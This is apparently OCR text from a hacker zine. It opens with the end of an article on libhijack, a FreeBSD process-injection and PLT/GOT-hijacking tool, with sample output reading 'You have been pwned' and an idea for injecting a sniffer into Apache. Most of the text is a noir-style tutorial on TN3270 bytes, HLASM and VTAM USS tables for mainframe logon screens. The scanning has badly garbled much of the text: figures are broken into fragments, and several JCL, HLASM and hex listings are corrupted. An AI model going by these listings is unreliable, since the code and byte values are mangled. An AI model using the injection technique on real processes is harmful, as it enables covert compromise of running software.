Parsing GEOIP IPv6 file /home/shawn/installs /share/tor/geoip6. 
Bootstrapped 096: 


Expect more bugs than 


"/home/shawn/installs/etc/tor/torrc". 


Starting 


Starting with guard context 
Bootstrapped 80%: 
Bootstrapped 85%: 
Bootstrapped 90%: 
Tor has successfully opened a circuit. 
is working. 

Bootstrapped 100%: Done 

injected shared object. 





"default" 


Connecting to the Tor network 
Finishing handshake with first hop 
Establishing a Tor circuit 


Looks like client 


You have been pwned. 


Figure 17. Output from Tor. 


The Future of libhijack 


Writing devious code in assembly is cumbersome. 
Assembly doesn't scale well to multiple architec- 
tures. Instead, we would like to write our devious 
code in C, compiling to a shared object that gets in- 
jected anonymously. Writing a remote RTLD within 
libhijack is in progress, but it will take a while as this 
is not an easy task. 

Additionally creation of a general-purpose 
helper library that gets injected would be useful. 
It could aid in PLT/GOT redirection attacks, pos- 
sibly storing the addresses of functions we've pre- 
viously hijacked. This work is dependent on the 
remote RILD. 

Once the ABI and API stabilize, formal docu- 
mentation for libhijack will be written. 





Conclusion 


Using libhijack, we can easily create anonymous 
memory mappings, inject into them arbitrary code, 
and hijack the PLT/GOT on FreeBSD. On Hard- 
enedBSD, a hardened derivative of FreeBSD, out 
tool is fully mitigated through PaX's NOEXEC. 

We've demonstrated that wrapper-style Cap- 
sicum is ineffective on FreeBSD. Through the use of 
libhijack, we emulate a control flow hijack in which 
the application is forced to call sandbox_open and 
fdlopen(3) on the resulting file descriptor. 

Further work to support anonymous injection of 
full shared objects, along with their dependencies, 
will be supported in the future. Imagine injecting 
libpcap into Apache to sniff traffic whenever “GET 
/pcap'" is sent. 

FreeBSD system administrators should set 
security.bsd.unprivileged proc debug to 0 to 
prevent abuse of ptrace. ‘To prevent process ma- 
nipulation, FreeBSD developers should implement 
PaX NOEXEC. 

Source code is available.** 





24git clone https://github.com/SoldierX/libhijack || unzip pocorgtfo17.pdf libhijack.zip 
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17:08 Murder on the USS Table 


The following is a dramatization of how I learned 
to write assembler, deal with mainframe forums, and 
make kick-ass VTAM USS Tables. Names have been 
fabricated, and I won't let the truth get in the way 
of a good story, but the information is real. 


It was about eleven o'clock in the evening, early 
summer, with the new moon leaving an inky dark- 
ness on the streets. The kids were in bed dreaming 
of sweet things while I was nursing a cheap bour- 
bon at the kitchen table. Dressed in an old t-shirt 
reminding me of better days, and cheap polyester 
pants, I was getting ready to call it a night when I 
saw trouble. Trouble has a name, Bigendian Smalls. 
A tall, blonde, drink of water who knows more about 
mainframe hacking than anyone else on the planet, 
with a penchant for cargo shorts. I could never say 
no to cargo shorts. 


The notification pinged my phone before it made 
it to Chrome. I knew, right then and there I wasn't 
calling it a night. Biggie needed something, and he 
needed it sooner rather than later. One thing you 
should know about me, Im no sucker, but when a 
friend is in need I jump at the chance to lend a hand. 





Before opening the message, I poured myself an- 
other glass. The sound of the cheap, room temper- 
ature bourbon cracking the ice broke the silence in 
my small kitchen, like an e-sport pro cracking her 
knuckles before a match. I opened the message: 








“Hey, I need your help. Can you make a main- 
frame logon screen for Kerberos? But can you add 
that stupid Windows 10 upgrade popup when some- 
one hits enter?" 


“Yeah,” I replied. Im not known for much. I 
don't have money. I'm as cheap as a Garfield joke 
in the Sunday papers. But I can do one thing well: 
Mainframe EBCDIC Art. 


I knew It was going to be a play on Cerberus, the 
three-headed dog. Finding that ASCII was the easy 
part. ASCII art has been around since the creation 
of the keyboard. People need to make art, regard- 
less of the tool. Finding ASCII art was going to be 
simple. Google, DuckDuckGo, or in desperate times 
and lots of good scotch, Bing, will supply the base 
that I need to create my master piece. The first 
response for a search for “Cerberus” and “ASCII” 
yielded my three-headed muse. 
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by Soldier of Fortran 
concerning an adventure with Bigendian Smalls 


/ 


( 
E 
T 


http 


( 

| ( 
SA 
(G6/ 


( 
://cerberus.ascii.uk/ 





The rest, however would require a friend's pre- 
vious work, as well as a deep understanding of the 
TN3270 protocol and mainframe assembler. 


When I got in to this game six years ago it was 
because I was tired of looking at the red “Z.” 





That red was rough, as though accessing this 
mainframe was going to lead me right to Satan him- 
self. (Little did I know I'd actually be begging to 
get by Cerberus.) 

The world of mainframes, it's a different world. 
A seedier world. One not well-travelled by the 
young, and often frequented by the harsh winds of 
corporate rule. Nothing on the mainframe comes 
easy or free. If you want to make art, you'll need 
more than just a keyboard. 

I started innocently enough, naively searching 
simple terms like “change mainframe logon screen." I 
stumbled around search results, and into chatrooms 
like a newborn giraffe learning to walk. You know 
the type, a conversation where everyone is trying to 


prove who's the smartest in the room. While ulti- 
mately useless, those initial searches taught me three 
things: I needed to understand the TN3270 pro- 
tocol, z/OS High Level Assembler (HLASM), and 
what the hell a VTAM and the USS Table were. 


I always knew I would have to learn T'N3270. 
It's the core of mainframe-user interaction. That 
green screen you see in movies when they say some- 
one “just hacked a mainframe.” I just never thought 
it would be to make art for my friends. TN3270 
is based on Telnet. Or put another way, Telnet is 
to TN3270 as a bike is to an expensive motorcycle. 
They sort of start out the same but after you make 
the wheels and frame they're about as different as 
every two-bit shoe shine. 

Looking at the way mainframes and their clients 
talk to one another is easy enough to understand, 
at first. Take a look at Figure 18. 

For anyone who understood telnet like I did, this 
handshake was easy enough to understand. 





IAC: Telnet Command 
DO/WILL: Do this! 


I will! 


SB: sub command 








But that's where it ended. Once the client was 
done negotiating the telnet options, the rest of the 
data looked garbled if you weren't trained to spot 
it. 

You see, mainframes came from looms. Looms 
spoke in punchcards which eventually moved to 
computers speaking EBCDIC. So, mainframes kept 
the language alive, like a small Quebec town trying 
to keep French alive. That TN3270 data was now 
going to be driven by an exclusively EBCDIC char- 
acter set. All the rest of the options negotiated, and 
commands sent, would be in this strange, ancient 
language. Lucky for me, my friend Tommy knows all 
about TN3270 and EBCDIC.? And Tommy owed 
me a favor. 





Just past a Chinese restaurant's dumpster was 
the entrance to Tommy's place. You'd never know 
it even existed unless you went down the alleyway 
to relieve yourself. As I approached the dark green 
door, I couldn't help but notice the pungent smell 
of decaying cabbage and dreams, steam billowing 
out of a vent smelled vaguely of pork dumplings. I 
knocked three times. The door opened suddenly and 





I was ushered in. I felt Tommy slam the door shut 
and heard no fewer than three cheap chain-locks set 
in to place. 

Tommy's place was stark white, like a website 
from the early 90s. No art, no flashing neon, just 
plain white with some printouts stuck on the white 
walls and the quiet hum of an unseen computer. The 
kind of place that makes you want to slowly wander 
around an Ikea. Tommy liked to keep things clean 
and simple and this place reflected that. 

Tommy, in his white lab coat, was a just a reg- 
ular man. As regular and boring as a vodka with 
lime and soda, if vodka, with lime and soda, wore 
large rimmed glasses. But he knew his way around 
TN3270, and that's what I needed right now. 

“So, I hear you need some help with T'N32707" 
Tommy asked. He already knew why I was there. 

“Yeah, I can't figure this garbage out and I need 
help writing my own," I replied. 

Tommy sighed and began explaining what I 
needed to know. He walked over to one of three 
whiteboards in the room. 

“The key thing you need to know is that after 
you negotiate T'N3270 there are seven control char- 
acters. But if all you want to do it make art, you 
only need to know these four: 








"TD 
KRZ n" 


Start Field 

Set Buffer Attribute 
Insert Cursor 

Start Field Extended 


"Nx13 n" 
W\ x29 n" 





żShttp://www.tommysprinkle.com/mvs/P3270/ctlchars.htm 
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“Unlike telnet, TN3270 is a basically 1920 char- 
acter string, for the original 24x80 size. The ter- 
minal knows you're starting 'cuz the first byte you 
send is a command (i.e. Nx05) followed by a Write 
Control Character (WCC). For you, sir artist, you'll 
want to send 'Erase/Write/ Alternate.” or \xF5\x7A. 
This gives you a blank canvas to work with by clear- 
ing the screen and resetting the terminal. 

“The remaining makeup of the screen is up to 
you. You use SBA to tell the terminal where 
you want your cursor to be, then use the 'Start 
Field'/'Start Field Extended’ commands to tell the 
terminal what kind of field it is going to be, also 
known as an attribute. Start field is used to lock 
and unlock the screen, but for your art it doesn't 
matter. 

“One thing you'll need to watch out for, anytime 
you use SF/SFE, is that it takes up one byte on the 


N3270 
N3270 


NGPIN, 
NGPIN 
N3270 (KINGPIN 
N3270 (KINGPIN 


(KI : << IAC DO TN3270 
(KI 
(KI 
(KI 
N3270 (KINGPIN 
(KI 
(KI 
(KI 
(KI 


: >> IAC WILL TN3270 
Entering TN3270 Mode: 


Created buffers 
N3270 NGPIN Current State: 
N3270 NGPIN 
N3270 NGPIN 


N3270 NGPIN 


T 
T 
T 
T 
T 
T 
T 
T 
T 


NGPIN 
NGPIN 
NGPIN 
NGPIN 
NGPIN 
NGPIN 


N3270 
N3270 
N3270 
N3270 
N3270 
N3270 


Confirmed Terminal Type: 
: LU Name: SMOGLUO2 




















eju HL. FH] 


(KI 
(KI 
(KI 
(KI 
(KI 
(KI 


Processing TN3270 Data 





Creating Empty IBM—3278—2 Buffer 
of length: 


1920 


; "TN3270E mode’ 

: << IAC SB TN3270 TN3270E SEND TN3270E DEVICE TYPE SE 

: >> IAC SB TN3270 TN3270E DEVICE TYPE TN3270E REQUEST IBM—3278—2—E IAC SE 

: << IAC SB TN3270 TN3270E DEVICE TYPE TN3270E IS IBM-3278—2- E 
TN3270E CONNECT SMOGL U 0 2 SE 

IBM—3278—2—E 








: >> IAC SB TN3270 TN3270E FUNCTIONS TN3270E REQUEST IAC SE 
: << IAC SB TN3270 TN3270E FUNCTIONS TN3270E IS SE 
: >> IAC SB TN3270 TN3270E FUNCTIONS TN3270E REQUEST IAC SE 





Figure 18. TN3270 Packet Trace 


screen. Setting the buffer location does not. Once 
you re done with your art, you'll need to place the 
cursor somewhere, using IC." 


Starting to understand, I headed to the white 
board and wrote Figure 19 in black marker. 


DARKLIES 


"Yes! That's it" exclaimed Tommy. “With what 
you have now, you could make a monochrome mas- 


terpiece! Keep in mind that the SF eats up one 
space. So basically you could fill out the rest of the 
screen’s 1,919 characters, remembering that the line 


\x05 WCC SBA 0 0 SF 0 





Here Lies Trouble 
2| x05 \x7A \x11 4x00 4x00 \x1D 4x00 Here Lies Trouble x13 


wraps at every 80 characters. But let's talk about 
SF and SFE." 

“In your, frankly simple, example," Tommy con- 
tinued, “you’d never get any color. To do that, we 
need to talk about the Start Field Extended (Nx29) 
command. That command is made up of the SFE 
byte itself, followed by a byte for the number of at- 
tributes, and then the attributes themselves. 

"There's two attributes we care about: SF 
(NxCO), and the most important one, which I'll get 
to in a minute. SF is what we use like above to con- 
trol the screen. If we wanted to protect the screen 
from being edited we could set it to NxF8. 

“Now, you'll want to listen closely because this 
attribute is arguably the most important to you. 
The color attribute (\x42) lets you set a color. Your 
choices are NxF1 through \xF7.” 





Blue 
Red 
Pink 


Green 
Turquoise 
Yellow 
White 





IC 


Figure 19. Placing the cursor after drawing. 
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1|x05 WOCSBA 0 0 
\x05 AxYA x11 4x00 4x00 \x1D 4x00 Here Lies Trouble 4x29 4x01 x42 


SF 0 


Here Lies Trouble 


SFE 1 COLOR WHITE Double IC 






Tommy grabs the black marker from my hand 
and begins adding to my simple example. 

“So, with a bit of this code, we can add a color 
statement to your commands. Remember to move 
the cursor to the end though. 


DRRKLIES 





Double 


" l'here's one last thing you should know, but it's 
a little advanced. You can set the location using 
SBA followed by a row/column value. Right now, 
you've set the buffer to 0/0. But using this special 
table," Tommy pointed to a printout he had lam- 


1,2° “we can point the 


inated and stuck to his wal 
buffer anywhere we—” 

Just then the door burst open, the sounds of 
those cheap locks breaking and hitting the floor 
echoed through the room. A dark figure stood in 
the doorway holding some type of automatic gun, 
which I couldn't place. Tommy quickly took cover 
behind a desk and I followed suit. I heard a voice 
yell out “How dare you teach him the way! He might 
not have the access he needs! Did you ask if he's al- 
lowed to make the kind of changes you're teaching? 
He should've spoken to his system programmer and 
read the manuals!” 

Tommy, visibly shaken, shouted, “Rico! 
sorry! I owed someone a favor and...” 


Im 


Rico opened fire. Little pieces of shattered 
whiteboard hitting me in the face. He wasn't aim- 
ing for us, but had destroyed our notes on the white 
board. I looked over and saw Tommy cowering un- 
der his desk, I had figured ‘Tommy’ was a nickname 


ż6http://www.tommysprinkle.com/mvs/P3270/bufaddr.htm 
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\xF7 Double x13 


for a favorite firearm, guess I was wrong. 

“You’ve given out free TN3270 help for the last 
time Tommy!” Rico shouts, and I heard the familiar 
sound of a gun being reloaded. I took a quick peek 
from my hiding place and noticed that Rico hadn’t 
even bothered to take cover, still standing in the 
doorway. Not wanting my epitaph to read, “Here 
lies a coward who died learning TN3270 behind a 
Chinese restaurant,” I pulled out my Colt detective 
special and opened fire. My aim had always been 
atrocious, but I fired blindly in the direction of the 
door, heard a yelp, and then silence. 

Tommy popped his head above the desk, “He’s 
gone, looks like he ran off, you better get out of here 
in case he and his goons return.” 

I took this as my cue and headed towards the 
door. I noticed part of the frame had splintered, 
and in the center of those splinters was my slug. 
looks like I just missed Rico. 

Tommy grabbed my arm as I’m about to leave, 
“You still need to learn some assembler and VTAM, 
go talk to Dave at The Empress, he can help you 
out. But never come back here again, you’re too 
much trouble.” 

The Empress. On the books it was a hotel. Off 
the books it’s where you went when you wanted 
help forgetting about the outside world. The lobby 
looked and smelled like a cheap computer case that 
hadn’t been cleaned out for years. Half the lights in 
the chandelier didn’t work, and it cast odd shadows 
on the furniture, giving the impression someone was 
there, watching you. It was the kind of place Euro- 
pean tourists booked because ‘Travelocity got them a 
great deal, but the price would immediately change 
once they arrived. No one came to the Empress for 
its good looks. Not-quite-top-40 music emanated 
from the barroom. 





I walked to the front desk, where a young man 
with a name tag that said “No Name” looked me up 
and down. “Can I help you?” Millennial sarcasm 
dripped off of every syllable. “I need to speak to 
Dave,” I replied. The clerk’s eyes widened a little, 
he quickly looked around and whispered “follow me.” 


know?” he asked. 

“Tommy sent me," I replied. 

Dave takes a long pull on his coffin nail, “Shit,” 
he says exhaling a large puff, “you tell Tommy that 
we're square after this. I assume you're here to learn 
HLASM? Can I ask why?" 

‘Tm trying to make some my mainframe look 
beter." I replied. 

Dave wasn't a tall man, but his stature, deep 
voice, and frame more than made up for it. The 
type of man you could trust to knock you out in one 
punch. His white hotel uniform was stained with 
what I hoped wasn't blood. 

He sighed and said “this way.” 

Dave led me to a small room off the laundry area 
with some books on the wall, lit by a single, bare 
bulb in the ceiling fixture. A black chalkboard stood 
in one corner, an old terminal on a standing desk, all 
the rage these days, at in the other. The walls were 
bare concrete. “I assume you already know JCL?” 
queried Dave. 

“Yes” I replied with a failed attempt at sarcasm, 


"A 
| A | “of course I know JCL."?5 
E / N A. “Good, this will be easy then." He took another 
| R SĄ // Ww | pull of his smoke and began writing on the black- 
ds f board, “There’re four executables available to you 
| | to compile an HLASM program on the mainframe. 
| i They are: 





| } l Assembles only 

| | Assembles and link edits 
\ { Assembles, links and runs 

d l| | Assembles, uses a loader to run 
y 





Dave walked over to the terminal and pulled up 


\ | | (| a file on the screen. “You need to pass it some op- 
| | | | tions, like this," he said, pointing to a line on the 
i 4 | screen: 


| //BUILD EXEC ASMACL 
//C.SYSLIB DD DSN=SYS1.SISTMAC1, DISP-SHR 


// DD DSN-SYS1.MACLIB, DISP=SHR 
//C.SYSIN DD « 





The clerk walked me past the kitchen, through 
the back hallways, in to the laundry room. He ush- 
ered me in, then abruptly left. A sole person was “Anything you type on the next line, after the 
folding linens in front of an industrial washing ma- * must be in HLASM and will be compiled by AS- 
chine, a freshly lit cigarette hung loosely from his MACL. Don’t worry about finding it, ASMACL is 
lips. ‘The fluorescent light turned his skin a pale given to us by Big Blue.” Dave's calloused fingers 
shade of blue. “Dave?” I called out.2” Dave put the flew over the keyboard and a moment later I was 
bed sheet down and walked over. ‘Who wants to staring at a blank file with the JCL job card and 


2"nttp://csc.columbusstate.edu/woolbright/WOOLBRIG.htm 
28PoC||GTFO 12:6, a JCL Adventure with Network Job Entries 
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compiler stuff filled out. “First, there re some rules 
with HLASM you should know. Each line can either 
be an instruction, continuation, or comment. Com- 
ments start with ‘*’. A Continuation line means 
that in the previous line there's a character (any 
character, doesn't matter which) in column 72, and 
the continued line itself must start on column 16." 

“You with me so far?" 

I nodded. 

“Good. Now, If it's not a comment or a contin- 
uation, the line can be broken down like so: 

“The first 10 characters can be empty or be a 
name/label. Following that you have your instruc- 
tion, a space, then your operands for that instruc- 
tion. Anything after the operands is a comment un- 
til the 71st column. Here's a dirty example." (Fig- 
ure 20.) 

“Every line can have a name. In HLASM you can 
create basic variables with an & in front of them. 
But not every line needs a name. Take a look at 
these three lines: 


&BLUE SETC 'X''290142F1' 
DC &BLUE Make it blue! 


Simple text 


DC C'Big Blue’ 


"Line one sets a symbol/label to &BLUE. If 
Tommy did his job right you should be able to recog- 
nize what it is supposed to do. The next line is DC, 
Declare Constant. Notice &BLUE has an X. That 
means it's in hex. When we want to send text, we 
can use ‘C’ for CHAR. If we wanted we could’ve writ- 
ten the above like this.” I watched as his fingers 
danced across the keyboard. 


1 DC X’290142F1’ 
DC C'Big Blue’ 


“But you'll likely be switching colors, so setting 
them all to variables makes your life easier. 


One 


2| SYMBOL DC X'DEADBEEF' 
x Another comment 
4 DC © Hello World’ 





A comment 


I'ma single line 


DC C'HELLO 
6 WORLD’ 


I’m a continuation 





caveat with using variables in HLASM: The assem- 
bler will replace any value you have with the vari- 
able, take a look at this: 


&KINGPIN SETC 
2| &BOSSBEGN SETC 

&BOSSEND SETC 
4| &BOSSBEGN EQU + 

* SOME CODE 
6|&BOSSEND EQU x 


’ BOSS’ 
B’. ? & KINGPIN’ 
E’. ’ & KINGPIN’ 








“Lets break this down so you can see what the 
compiler would do: 


&KINGPIN 
2| &BOSSBEGN 
&BOSSEND 


"BOSS 
BBOSS 
EBOSS 


BBOSS EQU = 


6| x SOME CODE 
EQU x 


EBOSS 





“This understanding will come in handy when 
you re making a USS Table.” I still didn't know 
what a USS Table was, but I let him go on. “If you 
have stuff you’re going to do over and over again, it 
would be easier to make a function, or in HLASM a 
macro, to handle the various request types. Macros 
are easy. On a single line you declare ‘MACRO’ in col- 
umn 10. The next line you give the macro a name, 
and it’s operands. You end a macro with the word 
‘MEND’ in column 10 on a single line. For example:” 

MACRO 
SCREEN &MSG-.,&TEXT-. 
DC &MSG 


DC &TEXT 
MEND 


SCREEN MSG=03 ,TEXT=’Big Blue’ 





I thought I was starting to get it, so I decided to 
ask a question. «How would we do an IF statement?” 
I asked. 


Figure 20. Dave’s Example 
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Dave smiles, but only a little, and walks back 
over to the blackboard and scribbles out the follow- 
ing: 


&MSG SETC C'04" 


AIF (’&MSG’ NE ’02’) .SKIP 
DC C’Not Equal to 2’ 


„SKIP ANOP 


DC C'End of Line’ 


“In HLASM you can use the AIF instruction. It's 
kind of like an IF. Here we have some code that will 
print ‘Not Equal to 2’ and ‘End of Line.’ If we set 
&MSG to ‘02’ it would jump ahead to .SKIP, what 
Big Blue would call a label. 

“T see you staring at that ANOP. I know what 
you re thinking, and the answer is yes. It’s exactly 
like a NOP in x86. Except it’s not an opcode, but 
a HLASM assembler instruction.” 

Dave headed back to the terminal and quickly 
scrolled to the bottom. "There's one last thing, since 
we re using ASMACL you need to tell the compiler 
where to put the compiled files. Take a look at this.” 


/ /L.SYSLMOD DD DISP-SHR, DSN-USER. VTAMLIB 
//L.SYSIN DD » 





NAME USSCORP (R) 


Dave tapped on the glowing screen. *This line 
right here. This tells the compiler to make a file 
USSCORP in the folder USER. VTAMLIB." I knew 
he meant Member and Partitioned Dataset but I 
figured Dave was dumbing things down for me and 
didn't want to interrupt. “That’s where your new 
USS Table goes," he continued. 

I jumped as someone softly knocked on the door, 
guess I was still a little jumpy from my encounter 
at Tommy’s. I saw through the round window in 
the door that the clerk had returned. Dave headed 
over and opened the door. I couldn't quite make out 
what they were saying to each other. Dave looked 
at his watch and turned to me, *Look, this has been 
swell, but you gotta get outta here. If my boss finds 
out I taught you this there ll be hell to pay and Im 
not looking to sleep with the fishes tonight—or any 
night. Sorry we're cutting this short, normally I'd 
be teaching you about the 16 registers and program 
entrance and exit, but we don't have time for that. 
And besides, you don’t need it to be a VTAM artist, 
but if you want to learn, read this." And he shoved 


22unzip pocorgtfoi7.pdf Asm-1.PPTx 
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a rather large slide deck in to my chest, at least 400 
pages thick.?? 


No Name told me to follow him yet again. As 
we left the laundry room I saw Dave stuffing soiled 
linens in to one of those washers; this time there's no 
wondering if it was blood or not. No Name ushered 
me down a different hallway than the one we came 
in. He walked quickly, with purpose. I struggle to 
keep up. 


We ended up at a door labeled ‘Emergency Exit.’ 
No Name opened the door and I headed through. 
Before I could turn around to say thanks, the big 
metal door slammed closed. I found myself in an- 
other dead-end alleyway. The air was cool now, the 
wind moist, betraying a rain fall that was yet to 
start. 





I began heading towards the road when a shad- 
owy figure stepped into the alley. I couldn't make 
out what he looked like, the neon signs behind him 
made a perfect silhouette. But I could already tell 
by his stance I was in trouble. 


“So,” the figure called out, “the boss tells me 
you're trying to change the USS Table eh?" I figured 
this must be one of Rico's goons. 


"| don't mean nothing by it,” I replied, “I’m just 
trying to make my mainframe nicer." 


^Rico has a message for you 'if you're trying to 
change the mainframe you should be talking to the 
people who run your mainframe, I've had enough of 
this business. " 


The gunshot echoed through the alleyway, the 
round hitting me square in the chest like a gamer 
punching his monitor in a rage quit. I landed on 
flat my back, smacked my head on the cold concrete, 
and sent pages of assembler lessons flying through 
the air. The wind knocked out of me, I felt the 
blackness take hold as I lay on the sidewalk. I could 
barely make out the figure standing over me, whis- 
pering ^when you get to the pearly gates, tell 'em 
the EF Boys sent ya." 


You know those dreams you have. The kind 
where you re in a water park, floating along a lazy 
river, or down a waterslide. I was having one of 
those. It was nice. Until I realized why I was dream- 
ing of getting wet. I woke face up, in an alleyway, 
the rain pounding me mercilessly. My trench coat 
was drenched by the downpour. I stood up, slowly, 
still dizzy from getting knocked out. 





How had I survived? I looked around and saw 
papers strewn about the alley. Something shiny, just 
next to where I took my forced nap, caught my eye. 
It was a neat pile of papers, held together by a dim- 
ple on the top sheet. I took a closer look and picked 
up the pages. 

Well lll be damned, the 400+ pages of assem- 
bler material took the bullet for me. Almost square 
in the middle was the bullet meant to end my jour- 
ney. I eternally grateful that Dave had given me 
those pages. Now, determined more than ever to 
finish what I started, I headed towards the street. 
I had two of the three pieces to the puzzle, but I 
needed dry clothes and my office was closer than 
going home. 





Nestled above a tech start-up on its last legs was 
a door that read 'Soldier of FORTRAN: Mainframe 
Hacker Extraordinaire.’ Inside was a desk, a chair, 
an LCD monitor and a PC older than the startup. A 
window, a quarter of the Venetian blinds torn free, 
looked out over the street. I didn't bother turning 
on the lights. The orange light that bled in from 
the lamppost on the street was enough. I pulled out 
my phone, put it on the desk, and started changing 
in to my dry clothes. The clothes were for when I 
hoped I would start biking to work which, as with 
all new year's resolutions, were yesterday's dream. 


Now dry, I decided to power on my PC and 
take some notes. I wrote down what I knew about 
TN3270 thanks to Tommy and HLASM courtesy of 
Dave. I was still missing a big piece. Where could 
I learn about this USS Table. My searches all led 
to the same place: The Mailing-List. A terrible bar 
on the other side of town I had no desire to visit. 
The Mailing-List, or ‘Dash L’ as some people called 
it, was filled with some of the meanest, least helpful 
individuals on this Big Blue planet. I was likely to 
get chased out of the place before I was even done 
asking my question, let alone receiving an answer. 

Don't get me wrong, sometimes Dash L had some 
great conversations, I know because I often lurk 
there for information I can use. But I had never 
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worked up the courage to ask a question there, lest 
I be banned for life. But, with nothing else to go on 
I grabbed my coat and umbrella and headed for the 
door. 

Just then, my phone rang. I didn't recognize the 
name-Nigel, or the number. I decided to answer the 
phone. Who's this, how’d you get my private num- 
ber?" No reply. I went to hang up the phone when I 
heard, “try searching for USSTAB and MSG10." My 
phone vibrated, letting me know the call was over. 
I ran to the window and peered out in to the rainy 
night. The street was empty except for a man with 
an umbrella putting his phone away. I ran down the 
stairs and caught a glimpse of the man as he got 
into his Tesla and sped off. 

Back at my desk, I searched for USSTAB and 
MSG10 and one name kept coming back: Big John. 
I knew Big John, of course. Anyone who did main- 
frame hacking knew him. He now played the ivories 
over at a fancy new club, the Duchess. My dusty 
work clothes would have to be fancy enough. 


You wouldn't know the Duchess was much, just 
by looking at it. A single purple bulb above a bright 
red vinyl entrance. The lamp shade cast a triangle of 
light over the door. The only giveaway that this was 
a happening place was the sound of 80s Synth rolling 
down the streets. Not the cheap elevator synth you 
get while waiting for your coffee, this was real synth: 
soulful and painful. The kind that made you doubt 
yourself and your life choices. 

I walked to the door and knocked. A slit opened 
up, “Can we help you?” a woman's voice asked. I 
couldn't wait for this new speakeasy revival trend 
to die. “Yes,” I replied, “I’m here to see Big John." 





*You have a reservation?" she asked. 

“Nope, just here to see Big John." 

“Honey, you outta luck. We got a whole room of 
people here to see Big John, and they got reserva- 
tions!” 





“How much sweetener to see him play tonight?” 
I ask. 

A second slot near my dad gut opened up, and a 
drawer popped out, almost like the door was happy 
to see me. I placed the only fifty I had in the tray. 
The drawer and slit closed and the door opened. 

A young woman took my coat and brought me to 
a table. I took my seat and casually looked around. 
The room was dimly lit, with most of the light com- 
ing from the stage. Smoke hung in the air like a 
summer haze waiting for a good thunderstorm. A 


waitress asked, “Drink sir?” I ordered a dirty mar- 
tini and enjoyed the rest of the show. It'd been a 
shit day, I needed a break. 

Once the show was done and the band started 
to pack up, I walked up to Big John. “Appar- 
ently you re a man who can help me with USSTAB 
and some TN3270 animations.” I say. He finished 
putting away his keytar in its carrying case. *I could 
be, what's in it for me?" My wallet was empty so 
I figured a play on his emotional side might work, 
"You'd get a chance to piss off Rico and the EF 
Gang." 

Big John looked at me and smiled. *Anything to 
piss of that hothead, follow me." I grabbed my coat 
from the front and followed him. 

Big John was the type of guy who lived up to 
the name. He was massive. Use to play professional 
football before he got injured and went back to his 
original loves: hacking and piano. Long dark hair 
and an even longer and darker beard made him look 
menacing. But if you ever knew Big John, you'd 
know he was just a big ‘ol softy. 

John led me to another alleyway behind the 
Duchess. What was it with this city and alleyways? 
It looked like the rain had let up, but it had left a 
cold, damp feeling in the air. Parked in the alley was 
a van, with a wizard riding a corvette painted on the 
side. Big John opened the back, set his keytar down 
and motioned for me to get in the van. 

Inside was a nicer office space than I have. Ex- 
pensive, custom mechanical keyboards lined one 
wall. Large 4k monitors hung on moveable arms. 
An Aeron chair was bolted to the floor. Somewhere, 
invisible to me, was a computer powerful enough to 
drive this setup. 

“So, I take it you've been to both Tommy and 
Dave already?" he asked over the clicking of his me- 
chanical keyboard as he logged on. 

“Yes,” I reply. “I think I understand enough to 
get started making my own logon screens. I can con- 
trol the flow and color of a T'N3270 session, and I 
know how to use HLASM to do so. But Dave kept 
referring to things like MSGs and a USS Table which 
makes no sense to me." 

Big John chuckled and sat down, lighting what 
looked like a hand-rolled cigarette but smelled like 
a skunk. “Don’t worry about Dave,” he said, taking 
a few puffs, “he’s an ex-EF Boy, he's still trying to 
get use to sharing information that people can un- 
derstand. Sometimes he's still a little cryptic. Let's 
get started." 


“When you connect to a mainframe, nine times 
outta ten its going to be VTAM,” Big John explains. 


“VTAM is like the first screen of an infocom 
game. It lets you know where you are, but from 
there it's up to you where you go, you get me?" he 
asks between puffs. 


I did, and I didn't. All I wanted to do was make 
pretty mainframes. 


“First thing you gotta know about VTAM is 
that it uses what it calls Unformatted System Ser- 
vices tables. Or USS tables for short. This file 
is normally specified in your TN3270 configuration 
file.” Big John swiveled his chair and launched his 
TN3270 client, connected, and opened a file labeled 
"USER. TCPPARMS(TN3270)' He pointed to a spe- 
cific line: 


1| USSTCP USSECORP 


1| //STEPLIB 
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“This line right here tells TCP to tell VTAM 
to use the file USSECORP” when a client con- 
nects.” he said, closing the file. He then opened 
"USER.PROCLIB(TN3270)' and pointed at a dif- 


ferent line: 


DD DSN-USER. VTAMLIB, DISP=SHR 


KINGPIN 


File Edit Edit Settings Nenu Utilities Compilers Test Help 


//STEPLIB DD DSH-USER.UTRIIL IB,DISP-SHR 





“And that right there is where we're gonna find 
USSECORP,” again he closed the current file and 
opened another folder: ‘USER.VTAMLIB’. And 
sure enough, glowing a deep blue, in the back of 
this van was USSECORP: 


KINGPIN 


Functions Confirm Utilities Help 


Menu 


**End** 





“So now you know where to send your compiled 
HLASM, your ’L.SYSLMOD’. Just overwrite that 
file and you'll be good to go. Oh wait" John 
laughed, “I haven’t explained how you can use the 
USS Table to make it less boring. Right, well it’s 
easy—ish. 

“The USS Table is basically a set of macros you 
call to tell VTAM what to do on each message or 
command it receives. Let’s take a look at this ex- 
ample.” He pointed to the other screen. 





1| USSN TITLE 


"GROOVY SCREEN’ 
USSTAB FORMAT-DYNAMIC 


3 USSMSG MSG=10,BUFFER=(BUF010 ,SCAN) 
BUFO10 DS 0H 
5 DC  AL2(ENDO010-BUFO10) 
DC X’F57A’ 
T DC X'2902CO0F842F1" 
DC C' Hello Flynn’ 
9 DC 10€? ^" 
DC X’13’ Insert Cursor 
ENDO10 EQU x 
END USSEND 


13 END 


“We start the USS Table with the Macro 
"USSTAB’ passing it the argument FORMAT. Just 
always set it to DYNAMIC. This is saying, from 
here on out we’re in USSTAB. The next line” 


1| USSMSG MSG=10,BUFFER=(BUF010 , SCAN) 


“This calls the USSMSG macro, which you can 
read in SYS1.SISTMAC1(USSMSG). You can pass 
it a bunch of variables, but for you, just pass it 
the MSG= and BUFFER- variables. MSG=10 
in our case is the default ‘hey you just connected’ 
message. BUFFER takes two arguments. SCAN 
will look through and replace any instance of key- 
words with the actual variable. Some examples 


would be AAQQDATE and AQAQQTIME. Which 
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would replace those items with the actual date/time. 
BUF010 is a pointer. It points to a data structure. 
The first thing BUFFER expects is the length of 
the buffer. Since we might add/remove more to our 
screen we can use just get the total size by subtract- 
ing the location of END010 by BEGINO10. Every- 
thing else inside there is what will be sent to VTAM 
to send to your TN3270 emulator. You keepin' up 
my man?" 


“Yeah,” I replied. “I think I got it. That line 
X? 2902COF842F1? isa T'N3270 command setting the 
text blue (\x42 NxF1) and that other line, two down, 
with 10C, just means to repeat that space ten times 
before we insert the cursor." 


John smirked, “well look at you, the artist. When 
you're done setting USS Tab stuff you just end 
it with USSEND. Keep in mind, there're fourteen 
MSGs, not that you'll need to deal with them if you 
